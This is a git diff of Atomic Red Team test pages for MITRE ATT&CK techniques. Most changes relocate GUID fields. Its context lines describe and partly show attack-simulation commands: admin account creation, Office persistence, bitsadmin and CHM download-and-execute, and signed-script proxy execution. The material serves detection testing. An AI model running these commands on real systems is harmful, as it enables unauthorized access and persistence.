## Atomic Test #6 - Share Discovery with PowerView - -auto_generated_guid: b1636f0a-ba82-435c-b699-0d78794d8bfd - Enumerate Domain Shares the current user has access. Upon execution, progress info about each share being scanned will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** b1636f0a-ba82-435c-b699-0d78794d8bfd + + + diff --git a/atomics/T1136.001/T1136.001.md b/atomics/T1136.001/T1136.001.md index 5a814eb8..de0dfdfd 100644 --- a/atomics/T1136.001/T1136.001.md +++ b/atomics/T1136.001/T1136.001.md @@ -22,13 +22,15 @@ Such accounts may be used to establish secondary credentialed access that do not
## Atomic Test #1 - Create a user account on a Linux system - -auto_generated_guid: 40d8eabd-e394-46f6-8785-b9bfa1d011d2 - Create a user via useradd + **Supported Platforms:** Linux +**auto_generated_guid:** 40d8eabd-e394-46f6-8785-b9bfa1d011d2 + + + #### Inputs: @@ -57,13 +59,15 @@ userdel #{username}
## Atomic Test #2 - Create a user account on a MacOS system - -auto_generated_guid: 01993ba5-1da3-4e15-a719-b690d4f0f0b2 - Creates a user on a MacOS system with dscl + **Supported Platforms:** macOS +**auto_generated_guid:** 01993ba5-1da3-4e15-a719-b690d4f0f0b2 + + + #### Inputs: @@ -98,14 +102,16 @@ dscl . -delete /Users/#{username}
## Atomic Test #3 - Create a new user in a command prompt - -auto_generated_guid: 6657864e-0323-4206-9344-ac9cd7265a4f - Creates a new user in a command prompt. Upon execution, "The command completed successfully." will be displayed. To verify the new account, run "net user" in powershell or CMD and observe that there is a new user named "T1136.001_CMD" + **Supported Platforms:** Windows +**auto_generated_guid:** 6657864e-0323-4206-9344-ac9cd7265a4f + + + #### Inputs: @@ -135,14 +141,16 @@ net user /del "#{username}" >nul 2>&1
## Atomic Test #4 - Create a new user in PowerShell - -auto_generated_guid: bc8be0ac-475c-4fbf-9b1d-9fffd77afbde - Creates a new user in PowerShell. Upon execution, details about the new account will be displayed in the powershell session. To verify the new account, run "net user" in powershell or CMD and observe that there is a new user named "T1136.001_PowerShell" + **Supported Platforms:** Windows +**auto_generated_guid:** bc8be0ac-475c-4fbf-9b1d-9fffd77afbde + + + #### Inputs: @@ -171,13 +179,15 @@ Remove-LocalUser -Name "#{username}" -ErrorAction Ignore
## Atomic Test #5 - Create a new user in Linux with `root` UID and GID. - -auto_generated_guid: a1040a30-d28b-4eda-bd99-bb2861a4616c - Creates a new user in Linux and adds the user to the `root` group. This technique was used by adversaries during the Butter attack campaign. + **Supported Platforms:** Linux +**auto_generated_guid:** a1040a30-d28b-4eda-bd99-bb2861a4616c + + + #### Inputs: @@ -208,13 +218,15 @@ userdel #{username}
## Atomic Test #6 - Create a new Windows admin user - -auto_generated_guid: fda74566-a604-4581-a4cc-fbbe21d66559 - Creates a new admin user in a command prompt. + **Supported Platforms:** Windows +**auto_generated_guid:** fda74566-a604-4581-a4cc-fbbe21d66559 + + + #### Inputs: diff --git a/atomics/T1136.002/T1136.002.md b/atomics/T1136.002/T1136.002.md index 698235a2..7ab024da 100644 --- a/atomics/T1136.002/T1136.002.md +++ b/atomics/T1136.002/T1136.002.md @@ -16,13 +16,15 @@ Such accounts may be used to establish secondary credentialed access that do not
## Atomic Test #1 - Create a new Windows domain admin user - -auto_generated_guid: fcec2963-9951-4173-9bfa-98d8b7834e62 - Creates a new domain admin user in a command prompt. + **Supported Platforms:** Windows +**auto_generated_guid:** fcec2963-9951-4173-9bfa-98d8b7834e62 + + + #### Inputs: @@ -54,13 +56,15 @@ net user "#{username}" >nul 2>&1 /del /domain
## Atomic Test #2 - Create a new account similar to ANONYMOUS LOGON - -auto_generated_guid: dc7726d2-8ccb-4cc6-af22-0d5afb53a548 - Create a new account similar to ANONYMOUS LOGON in a command prompt. + **Supported Platforms:** Windows +**auto_generated_guid:** dc7726d2-8ccb-4cc6-af22-0d5afb53a548 + + + #### Inputs: @@ -90,13 +94,15 @@ net user "#{username}" >nul 2>&1 /del /domain
## Atomic Test #3 - Create a new Domain Account using PowerShell - -auto_generated_guid: 5a3497a4-1568-4663-b12a-d4a5ed70c7d7 - Creates a new Domain User using the credentials of the Current User + **Supported Platforms:** Windows +**auto_generated_guid:** 5a3497a4-1568-4663-b12a-d4a5ed70c7d7 + + + #### Inputs: diff --git a/atomics/T1137.002/T1137.002.md b/atomics/T1137.002/T1137.002.md index 1fee5136..630447b7 100644 --- a/atomics/T1137.002/T1137.002.md +++ b/atomics/T1137.002/T1137.002.md @@ -17,14 +17,16 @@ Adversaries may add this Registry key and specify a malicious DLL that will be e
## Atomic Test #1 - Office Application Startup Test Persistence - -auto_generated_guid: c3e35b58-fe1c-480b-b540-7600fb612563 - Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. Key is used for debugging purposes. Not created by default & exist in HKCU & HKLM hives. + **Supported Platforms:** Windows +**auto_generated_guid:** c3e35b58-fe1c-480b-b540-7600fb612563 + + + #### Inputs: diff --git a/atomics/T1137.004/T1137.004.md b/atomics/T1137.004/T1137.004.md index c7058537..28762842 100644 --- a/atomics/T1137.004/T1137.004.md +++ b/atomics/T1137.004/T1137.004.md @@ -13,15 +13,17 @@ Once malicious home pages have been added to the user’s mailbox, they will be
## Atomic Test #1 - Install Outlook Home Page Persistence - -auto_generated_guid: 7a91ad51-e6d2-4d43-9471-f26362f5738e - This test simulates persistence being added to a host via the Outlook Home Page functionality. This causes Outlook to retrieve URL containing a malicious payload every time the targeted folder is viewed. Triggering the payload requires manually opening Outlook and viewing the targetted folder (e.g. Inbox). + **Supported Platforms:** Windows +**auto_generated_guid:** 7a91ad51-e6d2-4d43-9471-f26362f5738e + + + #### Inputs: diff --git a/atomics/T1137/T1137.md b/atomics/T1137/T1137.md index b8b4f65b..b765083c 100644 --- a/atomics/T1137/T1137.md +++ b/atomics/T1137/T1137.md @@ -12,17 +12,19 @@ A variety of features have been discovered in Outlook that can be abused to obta
## Atomic Test #1 - Office Application Startup - Outlook as a C2 - -auto_generated_guid: bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c - As outlined in MDSEC's Blog post https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/ it is possible to use Outlook Macro as a way to achieve persistance and execute arbitrary commands. This transform Outlook into a C2. Too achieve this two things must happened on the syste - The macro security registry value must be set to '4' - A file called VbaProject.OTM must be created in the Outlook Folder. + **Supported Platforms:** Windows +**auto_generated_guid:** bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c + + + diff --git a/atomics/T1140/T1140.md b/atomics/T1140/T1140.md index fc670d0d..c4b0d4ed 100644 --- a/atomics/T1140/T1140.md +++ b/atomics/T1140/T1140.md @@ -16,14 +16,16 @@ Sometimes a user's action may be required to open it for deobfuscation or decryp
## Atomic Test #1 - Deobfuscate/Decode Files Or Information - -auto_generated_guid: dc6fe391-69e6-4506-bd06-ea5eeb4082f8 - Encode/Decode executable Upon execution a file named T1140_calc_decoded.exe will be placed in the temp folder + **Supported Platforms:** Windows +**auto_generated_guid:** dc6fe391-69e6-4506-bd06-ea5eeb4082f8 + + + #### Inputs: @@ -54,13 +56,15 @@ del %temp%\T1140_calc_decoded.exe >nul 2>&1
## Atomic Test #2 - Certutil Rename and Decode - -auto_generated_guid: 71abc534-3c05-4d0c-80f7-cbe93cb2aa94 - Rename certutil and decode a file. This is in reference to latest research by FireEye [here](https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html) + **Supported Platforms:** Windows +**auto_generated_guid:** 71abc534-3c05-4d0c-80f7-cbe93cb2aa94 + + + #### Inputs: diff --git a/atomics/T1176/T1176.md b/atomics/T1176/T1176.md index a5a461b2..4cc5ff74 100644 --- a/atomics/T1176/T1176.md +++ b/atomics/T1176/T1176.md @@ -24,13 +24,15 @@ There have also been instances of botnets using a persistent backdoor through ma
## Atomic Test #1 - Chrome (Developer Mode) - -auto_generated_guid: 3ecd790d-2617-4abf-9a8c-4e8d47da9ee1 - Turn on Chrome developer mode and Load Extension found in the src directory + **Supported Platforms:** Linux, Windows, macOS +**auto_generated_guid:** 3ecd790d-2617-4abf-9a8c-4e8d47da9ee1 + + + #### Run it with these steps! @@ -52,13 +54,15 @@ tick 'Developer Mode'.
## Atomic Test #2 - Chrome (Chrome Web Store) - -auto_generated_guid: 4c83940d-8ca5-4bb2-8100-f46dc914bc3f - Install the "Minimum Viable Malicious Extension" Chrome extension + **Supported Platforms:** Linux, Windows, macOS +**auto_generated_guid:** 4c83940d-8ca5-4bb2-8100-f46dc914bc3f + + + #### Run it with these steps! @@ -77,13 +81,15 @@ in Chrome
## Atomic Test #3 - Firefox - -auto_generated_guid: cb790029-17e6-4c43-b96f-002ce5f10938 - Create a file called test.wma, with the duration of 30 seconds + **Supported Platforms:** Linux, Windows, macOS +**auto_generated_guid:** cb790029-17e6-4c43-b96f-002ce5f10938 + + + #### Run it with these steps! @@ -104,13 +110,15 @@ click "Load Temporary Add-on"
## Atomic Test #4 - Edge Chromium Addon - VPN - -auto_generated_guid: 3d456e2b-a7db-4af8-b5b3-720e7c4d9da5 - Adversaries may use VPN extensions in an attempt to hide traffic sent from a compromised host. This will install one (of many) available VPNS in the Edge add-on store. + **Supported Platforms:** Windows, macOS +**auto_generated_guid:** 3d456e2b-a7db-4af8-b5b3-720e7c4d9da5 + + + #### Run it with these steps! diff --git a/atomics/T1197/T1197.md b/atomics/T1197/T1197.md index 55789fa2..f5068754 100644 --- a/atomics/T1197/T1197.md +++ b/atomics/T1197/T1197.md @@ -22,14 +22,16 @@ BITS upload functionalities can also be used to perform [Exfiltration Over Alter
## Atomic Test #1 - Bitsadmin Download (cmd) - -auto_generated_guid: 3c73d728-75fb-4180-a12f-6712864d7421 - This test simulates an adversary leveraging bitsadmin.exe to download and execute a payload + **Supported Platforms:** Windows +**auto_generated_guid:** 3c73d728-75fb-4180-a12f-6712864d7421 + + + #### Inputs: @@ -59,16 +61,18 @@ del #{local_file} >nul 2>&1
## Atomic Test #2 - Bitsadmin Download (PowerShell) - -auto_generated_guid: f63b8bc4-07e5-4112-acba-56f646f3f0bc - This test simulates an adversary leveraging bitsadmin.exe to download and execute a payload leveraging PowerShell Upon execution you will find a github markdown file downloaded to the Temp directory + **Supported Platforms:** Windows +**auto_generated_guid:** f63b8bc4-07e5-4112-acba-56f646f3f0bc + + + #### Inputs: @@ -98,16 +102,18 @@ Remove-Item #{local_file} -ErrorAction Ignore
## Atomic Test #3 - Persist, Download, & Execute - -auto_generated_guid: 62a06ec5-5754-47d2-bcfc-123d8314c6ae - This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transferand execute a payload in multiple steps. Note that in this test, the file executed is not the one downloaded. The downloading of a random file is simply the trigger for getting bitsdamin to run an executable. This has the interesting side effect of causing the executable (e.g. notepad) to run with an Initiating Process of "svchost.exe" and an Initiating Process Command Line of "svchost.exe -k netsvcs -p -s BITS" This job will remain in the BITS queue until complete or for up to 90 days by default if not removed. + **Supported Platforms:** Windows +**auto_generated_guid:** 62a06ec5-5754-47d2-bcfc-123d8314c6ae + + + #### Inputs: @@ -144,16 +150,18 @@ del #{local_file} >nul 2>&1
## Atomic Test #4 - Bits download using desktopimgdownldr.exe (cmd) - -auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114 - This test simulates using desktopimgdownldr.exe to download a malicious file instead of a desktop or lockscreen background img. The process that actually makes the TCP connection and creates the file on the disk is a svchost process (“-k netsvc -p -s BITS”) and not desktopimgdownldr.exe. See https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/ + **Supported Platforms:** Windows +**auto_generated_guid:** afb5e09e-e385-4dee-9a94-6ee60979d114 + + + #### Inputs: diff --git a/atomics/T1201/T1201.md b/atomics/T1201/T1201.md index 9ed98eb9..e2953cf8 100644 --- a/atomics/T1201/T1201.md +++ b/atomics/T1201/T1201.md @@ -24,13 +24,15 @@ Password policies can be set and discovered on Windows, Linux, and macOS systems
## Atomic Test #1 - Examine password complexity policy - Ubuntu - -auto_generated_guid: 085fe567-ac84-47c7-ac4c-2688ce28265b - Lists the password complexity policy to console on Ubuntu Linux. + **Supported Platforms:** Linux +**auto_generated_guid:** 085fe567-ac84-47c7-ac4c-2688ce28265b + + + @@ -50,13 +52,15 @@ cat /etc/pam.d/common-password
## Atomic Test #2 - Examine password complexity policy - CentOS/RHEL 7.x - -auto_generated_guid: 78a12e65-efff-4617-bc01-88f17d71315d - Lists the password complexity policy to console on CentOS/RHEL 7.x Linux. + **Supported Platforms:** Linux +**auto_generated_guid:** 78a12e65-efff-4617-bc01-88f17d71315d + + + @@ -88,13 +92,15 @@ echo Please run from CentOS or RHEL v7
## Atomic Test #3 - Examine password complexity policy - CentOS/RHEL 6.x - -auto_generated_guid: 6ce12552-0adb-4f56-89ff-95ce268f6358 - Lists the password complexity policy to console on CentOS/RHEL 6.x Linux. + **Supported Platforms:** Linux +**auto_generated_guid:** 6ce12552-0adb-4f56-89ff-95ce268f6358 + + + @@ -127,13 +133,15 @@ echo Please run from CentOS or RHEL v6
## Atomic Test #4 - Examine password expiration policy - All Linux - -auto_generated_guid: 7c86c55c-70fa-4a05-83c9-3aa19b145d1a - Lists the password expiration policy to console on CentOS/RHEL/Ubuntu. + **Supported Platforms:** Linux +**auto_generated_guid:** 7c86c55c-70fa-4a05-83c9-3aa19b145d1a + + + @@ -153,13 +161,15 @@ cat /etc/login.defs
## Atomic Test #5 - Examine local password policy - Windows - -auto_generated_guid: 4588d243-f24e-4549-b2e3-e627acc089f6 - Lists the local password policy to console on Windows. + **Supported Platforms:** Windows +**auto_generated_guid:** 4588d243-f24e-4549-b2e3-e627acc089f6 + + + @@ -179,13 +189,15 @@ net accounts
## Atomic Test #6 - Examine domain password policy - Windows - -auto_generated_guid: 46c2c362-2679-4ef5-aec9-0e958e135be4 - Lists the domain password policy to console on Windows. + **Supported Platforms:** Windows +**auto_generated_guid:** 46c2c362-2679-4ef5-aec9-0e958e135be4 + + + @@ -205,13 +217,15 @@ net accounts /domain
## Atomic Test #7 - Examine password policy - macOS - -auto_generated_guid: 4b7fa042-9482-45e1-b348-4b756b2a0742 - Lists the password policy to console on macOS. + **Supported Platforms:** macOS +**auto_generated_guid:** 4b7fa042-9482-45e1-b348-4b756b2a0742 + + + diff --git a/atomics/T1202/T1202.md b/atomics/T1202/T1202.md index 3c32944b..fb234e50 100644 --- a/atomics/T1202/T1202.md +++ b/atomics/T1202/T1202.md @@ -16,15 +16,17 @@ Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.
## Atomic Test #1 - Indirect Command Execution - pcalua.exe - -auto_generated_guid: cecfea7a-5f03-4cdd-8bc8-6f7c22862440 - The Program Compatibility Assistant (pcalua.exe) may invoke the execution of programs and commands from a Command-Line Interface. [Reference](https://twitter.com/KyleHanslovan/status/912659279806640128) Upon execution, calc.exe should open + **Supported Platforms:** Windows +**auto_generated_guid:** cecfea7a-5f03-4cdd-8bc8-6f7c22862440 + + + #### Inputs: @@ -51,16 +53,18 @@ pcalua.exe -a #{payload_path}
## Atomic Test #2 - Indirect Command Execution - forfiles.exe - -auto_generated_guid: 8b34a448-40d9-4fc3-a8c8-4bb286faf7dc - forfiles.exe may invoke the execution of programs and commands from a Command-Line Interface. [Reference](https://github.com/api0cradle/LOLBAS/blob/master/OSBinaries/Forfiles.md) "This is basically saying for each occurrence of notepad.exe in c:\windows\system32 run calc.exe" Upon execution calc.exe will be opened + **Supported Platforms:** Windows +**auto_generated_guid:** 8b34a448-40d9-4fc3-a8c8-4bb286faf7dc + + + #### Inputs: @@ -86,15 +90,17 @@ forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe
## Atomic Test #3 - Indirect Command Execution - conhost.exe - -auto_generated_guid: cf3391e0-b482-4b02-87fc-ca8362269b29 - conhost.exe refers to a host process for the console window. It provide an interface between command prompt and Windows explorer. Executing it through command line can create process ancestry anomalies [Reference] (http://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/) + **Supported Platforms:** Windows +**auto_generated_guid:** cf3391e0-b482-4b02-87fc-ca8362269b29 + + + #### Inputs: diff --git a/atomics/T1204.002/T1204.002.md b/atomics/T1204.002/T1204.002.md index e5bc2484..f9bf6006 100644 --- a/atomics/T1204.002/T1204.002.md +++ b/atomics/T1204.002/T1204.002.md @@ -28,17 +28,19 @@ While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently
## Atomic Test #1 - OSTap Style Macro Execution - -auto_generated_guid: 8bebc690-18c7-4549-bc98-210f7019efff - This Test uses a VBA macro to create and execute #{jse_path} with cscript.exe. Upon execution, the .jse file launches wscript.exe. Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents. This is a known execution chain observed by the OSTap downloader commonly used in TrickBot campaigns. References: https://www.computerweekly.com/news/252470091/TrickBot-Trojan-switches-to-stealthy-Ostap-downloader + **Supported Platforms:** Windows +**auto_generated_guid:** 8bebc690-18c7-4549-bc98-210f7019efff + + + #### Inputs: @@ -88,13 +90,15 @@ Write-Host "You will need to install Microsoft #{ms_product} manually to meet th
## Atomic Test #2 - OSTap Payload Download - -auto_generated_guid: 3f3af983-118a-4fa1-85d3-ba4daa739d80 - Uses cscript //E:jscript to download a file + **Supported Platforms:** Windows +**auto_generated_guid:** 3f3af983-118a-4fa1-85d3-ba4daa739d80 + + + #### Inputs: @@ -125,14 +129,16 @@ del #{script_file} /F /Q >nul 2>&1
## Atomic Test #3 - Maldoc choice flags command execution - -auto_generated_guid: 0330a5d2-a45a-4272-a9ee-e364411c4b18 - This Test uses a VBA macro to execute cmd with flags observed in recent maldoc and 2nd stage downloaders. Upon execution, CMD will be launched. Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents. + **Supported Platforms:** Windows +**auto_generated_guid:** 0330a5d2-a45a-4272-a9ee-e364411c4b18 + + + #### Inputs: @@ -177,14 +183,16 @@ Write-Host "You will need to install Microsoft #{ms_product} manually to meet th
## Atomic Test #4 - OSTAP JS version - -auto_generated_guid: add560ef-20d6-4011-a937-2c340f930911 - Malicious JavaScript executing CMD which spawns wscript.exe //e:jscript Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents. + **Supported Platforms:** Windows +**auto_generated_guid:** add560ef-20d6-4011-a937-2c340f930911 + + + #### Inputs: @@ -230,13 +238,15 @@ Write-Host "You will need to install Microsoft #{ms_product} manually to meet th
## Atomic Test #5 - Office launching .bat file from AppData - -auto_generated_guid: 9215ea92-1ded-41b7-9cd6-79f9a78397aa - Microsoft Office creating then launching a .bat script from an AppData directory. The .bat file launches calc.exe when opened. + **Supported Platforms:** Windows +**auto_generated_guid:** 9215ea92-1ded-41b7-9cd6-79f9a78397aa + + + #### Inputs: @@ -282,18 +292,20 @@ Write-Host "You will need to install Microsoft #{ms_product} manually to meet th
## Atomic Test #6 - Excel 4 Macro - -auto_generated_guid: 4ea1fc97-8a46-4b4e-ba48-af43d2a98052 - This module creates an Excel 4 Macro (XLM) enabled spreadsheet and executes it. The XLM will first write a "malicious" VBS file to %TEMP%, then execute this file. The VBS will download Process Explorer to the same directory (%TEMP%) and exec. A note regarding this module. By default, this module will pull the current username from the system and places it into the macro. If you'd like to utilize the "=GET.WORKSPACE(26)" method, that many maldoc authors use, you will need to ensure that the User Name associated with Excel matches that of the local system. This username can be found under Files -> Options -> Username + **Supported Platforms:** Windows +**auto_generated_guid:** 4ea1fc97-8a46-4b4e-ba48-af43d2a98052 + + + #### Inputs: @@ -392,15 +404,17 @@ Write-Host "You will need to install Microsoft Excel manually to meet this requi
## Atomic Test #7 - Headless Chrome code execution via VBA - -auto_generated_guid: a19ee671-ed98-4e9d-b19c-d1954a51585a - This module uses Google Chrome combined with ScriptControl to achieve code execution. It spawns a local webserver hosting our malicious payload. Headless Google Chrome will then reach out to this webserver and pull down the script and execute it. By default the payload will execute calc.exe on the system. + **Supported Platforms:** Windows +**auto_generated_guid:** a19ee671-ed98-4e9d-b19c-d1954a51585a + + + @@ -449,13 +463,15 @@ Write-Host "You will need to install Google Chrome manually to meet this require
## Atomic Test #8 - Potentially Unwanted Applications (PUA) - -auto_generated_guid: 02f35d62-9fdc-4a97-b899-a5d9a876d295 - The Potentially Unwanted Applications (PUA) protection feature in antivirus software can identify and block PUAs from downloading and installing on endpoints in your network. These applications are not considered viruses, malware, or other types of threats, but might perform actions on endpoints that adversely affect their performance or use. This file is similar to EICAR test virus file, but is considered a Potentially Unwanted Application (PUA) instead of a VIRUS (i.e. not actually malicious, but is flagged as it to verify anti-pua protection). + **Supported Platforms:** Windows +**auto_generated_guid:** 02f35d62-9fdc-4a97-b899-a5d9a876d295 + + + #### Inputs: diff --git a/atomics/T1207/T1207.md b/atomics/T1207/T1207.md index 8c22bc80..a93d1f53 100644 --- a/atomics/T1207/T1207.md +++ b/atomics/T1207/T1207.md @@ -14,9 +14,6 @@ This technique may bypass system logging and security monitors such as security
## Atomic Test #1 - DCShadow - Mimikatz - -auto_generated_guid: 0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6 - Use Mimikatz DCShadow method to simulate behavior of a Domain Controller and edit protected attribute. [DCShadow](https://www.dcshadow.com/) @@ -27,9 +24,14 @@ Get-ADObject -LDAPFilter '(samaccountname=)' -Properties badpwdcount | sel Need SYSTEM privileges locally (automatically obtained via PsExec, so running as admin is sufficient), and Domain Admin remotely. The easiest is to run elevated and as a Domain Admin user. + **Supported Platforms:** Windows +**auto_generated_guid:** 0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6 + + + #### Inputs: diff --git a/atomics/T1216.001/T1216.001.md b/atomics/T1216.001/T1216.001.md index 66a7732e..90da7ee0 100644 --- a/atomics/T1216.001/T1216.001.md +++ b/atomics/T1216.001/T1216.001.md @@ -12,13 +12,15 @@
## Atomic Test #1 - PubPrn.vbs Signed Script Bypass - -auto_generated_guid: 9dd29a1f-1e16-4862-be83-913b10a88f6c - Executes the signed PubPrn.vbs script with options to download and execute an arbitrary payload. + **Supported Platforms:** Windows +**auto_generated_guid:** 9dd29a1f-1e16-4862-be83-913b10a88f6c + + + #### Inputs: diff --git a/atomics/T1216/T1216.md b/atomics/T1216/T1216.md index c73cfd7b..75554d61 100644 --- a/atomics/T1216/T1216.md +++ b/atomics/T1216/T1216.md @@ -12,14 +12,16 @@
## Atomic Test #1 - SyncAppvPublishingServer Signed Script PowerShell Command Execution - -auto_generated_guid: 275d963d-3f36-476c-8bef-a2a3960ee6eb - Executes the signed SyncAppvPublishingServer script with options to execute an arbitrary PowerShell command. Upon execution, calc.exe will be launched. + **Supported Platforms:** Windows +**auto_generated_guid:** 275d963d-3f36-476c-8bef-a2a3960ee6eb + + + #### Inputs: @@ -44,13 +46,15 @@ C:\windows\system32\SyncAppvPublishingServer.vbs "\n;#{command_to_execute}"
## Atomic Test #2 - manage-bde.wsf Signed Script Command Execution - -auto_generated_guid: 2a8f2d3c-3dec-4262-99dd-150cb2a4d63a - Executes the signed manage-bde.wsf script with options to execute an arbitrary command. + **Supported Platforms:** Windows +**auto_generated_guid:** 2a8f2d3c-3dec-4262-99dd-150cb2a4d63a + + + #### Inputs: diff --git a/atomics/T1217/T1217.md b/atomics/T1217/T1217.md index a7ef7b04..19cac217 100644 --- a/atomics/T1217/T1217.md +++ b/atomics/T1217/T1217.md @@ -26,13 +26,15 @@ Specific storage locations vary based on platform and/or application, but browse
## Atomic Test #1 - List Mozilla Firefox Bookmark Database Files on Linux - -auto_generated_guid: 3a41f169-a5ab-407f-9269-abafdb5da6c2 - Searches for Mozilla Firefox's places.sqlite file (on Linux distributions) that contains bookmarks and lists any found instances to a text file. + **Supported Platforms:** Linux +**auto_generated_guid:** 3a41f169-a5ab-407f-9269-abafdb5da6c2 + + + #### Inputs: @@ -62,13 +64,15 @@ rm -f #{output_file} 2>/dev/null
## Atomic Test #2 - List Mozilla Firefox Bookmark Database Files on macOS - -auto_generated_guid: 1ca1f9c7-44bc-46bb-8c85-c50e2e94267b - Searches for Mozilla Firefox's places.sqlite file (on macOS) that contains bookmarks and lists any found instances to a text file. + **Supported Platforms:** macOS +**auto_generated_guid:** 1ca1f9c7-44bc-46bb-8c85-c50e2e94267b + + + #### Inputs: @@ -98,13 +102,15 @@ rm -f #{output_file} 2>/dev/null
## Atomic Test #3 - List Google Chrome Bookmark JSON Files on macOS - -auto_generated_guid: b789d341-154b-4a42-a071-9111588be9bc - Searches for Google Chrome's Bookmark file (on macOS) that contains bookmarks in JSON format and lists any found instances to a text file. + **Supported Platforms:** macOS +**auto_generated_guid:** b789d341-154b-4a42-a071-9111588be9bc + + + #### Inputs: @@ -134,14 +140,16 @@ rm -f #{output_file} 2>/dev/null
## Atomic Test #4 - List Google Chrome Bookmarks on Windows with powershell - -auto_generated_guid: faab755e-4299-48ec-8202-fc7885eb6545 - Searches for Google Chromes's Bookmarks file (on Windows distributions) that contains bookmarks. Upon execution, paths that contain bookmark files will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** faab755e-4299-48ec-8202-fc7885eb6545 + + + @@ -161,14 +169,16 @@ Get-ChildItem -Path C:\Users\ -Filter Bookmarks -Recurse -ErrorAction SilentlyCo
## Atomic Test #5 - List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt - -auto_generated_guid: 76f71e2f-480e-4bed-b61e-398fe17499d5 - Searches for Google Chromes's and Edge Chromium's Bookmarks file (on Windows distributions) that contains bookmarks. Upon execution, paths that contain bookmark files will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 76f71e2f-480e-4bed-b61e-398fe17499d5 + + + @@ -188,14 +198,16 @@ where /R C:\Users\ Bookmarks
## Atomic Test #6 - List Mozilla Firefox bookmarks on Windows with command prompt - -auto_generated_guid: 4312cdbc-79fc-4a9c-becc-53d49c734bc5 - Searches for Mozilla Firefox bookmarks file (on Windows distributions) that contains bookmarks in a SQLITE database. Upon execution, paths that contain bookmark files will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 4312cdbc-79fc-4a9c-becc-53d49c734bc5 + + + @@ -215,13 +227,15 @@ where /R C:\Users\ places.sqlite
## Atomic Test #7 - List Internet Explorer Bookmarks using the command prompt - -auto_generated_guid: 727dbcdb-e495-4ab1-a6c4-80c7f77aef85 - This test will list the bookmarks for Internet Explorer that are found in the Favorites folder + **Supported Platforms:** Windows +**auto_generated_guid:** 727dbcdb-e495-4ab1-a6c4-80c7f77aef85 + + + diff --git a/atomics/T1218.001/T1218.001.md b/atomics/T1218.001/T1218.001.md index a76fe782..270b1aa0 100644 --- a/atomics/T1218.001/T1218.001.md +++ b/atomics/T1218.001/T1218.001.md @@ -24,14 +24,16 @@ A custom CHM file containing embedded payloads could be delivered to a victim th
## Atomic Test #1 - Compiled HTML Help Local Payload - -auto_generated_guid: 5cb87818-0d7c-4469-b7ef-9224107aebe8 - Uses hh.exe to execute a local compiled HTML Help payload. Upon execution calc.exe will open + **Supported Platforms:** Windows +**auto_generated_guid:** 5cb87818-0d7c-4469-b7ef-9224107aebe8 + + + #### Inputs: @@ -69,14 +71,16 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - Compiled HTML Help Remote Payload - -auto_generated_guid: 0f8af516-9818-4172-922b-42986ef1e81d - Uses hh.exe to execute a remote compiled HTML Help payload. Upon execution displays an error saying the file cannot be open + **Supported Platforms:** Windows +**auto_generated_guid:** 0f8af516-9818-4172-922b-42986ef1e81d + + + #### Inputs: @@ -101,13 +105,15 @@ hh.exe #{remote_chm_file}
## Atomic Test #3 - Invoke CHM with default Shortcut Command Execution - -auto_generated_guid: 29d6f0d7-be63-4482-8827-ea77126c1ef7 - Executes a CHM file with the default Shortcut Command method. + **Supported Platforms:** Windows +**auto_generated_guid:** 29d6f0d7-be63-4482-8827-ea77126c1ef7 + + + #### Inputs: @@ -147,13 +153,15 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #4 - Invoke CHM with InfoTech Storage Protocol Handler - -auto_generated_guid: b4094750-5fc7-4e8e-af12-b4e36bf5e7f6 - Executes a CHM file with the ITS protocol handler. + **Supported Platforms:** Windows +**auto_generated_guid:** b4094750-5fc7-4e8e-af12-b4e36bf5e7f6 + + + #### Inputs: @@ -194,13 +202,15 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #5 - Invoke CHM Simulate Double click - -auto_generated_guid: 5decef42-92b8-4a93-9eb2-877ddcb9401a - Executes a CHM file simulating a user double click. + **Supported Platforms:** Windows +**auto_generated_guid:** 5decef42-92b8-4a93-9eb2-877ddcb9401a + + + #### Inputs: @@ -239,13 +249,15 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #6 - Invoke CHM with Script Engine and Help Topic - -auto_generated_guid: 4f83adda-f5ec-406d-b318-9773c9ca92e5 - Executes a CHM file with a defined script engine, ITS Protocol Handler, and help topic extension. + **Supported Platforms:** Windows +**auto_generated_guid:** 4f83adda-f5ec-406d-b318-9773c9ca92e5 + + + #### Inputs: @@ -288,13 +300,15 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
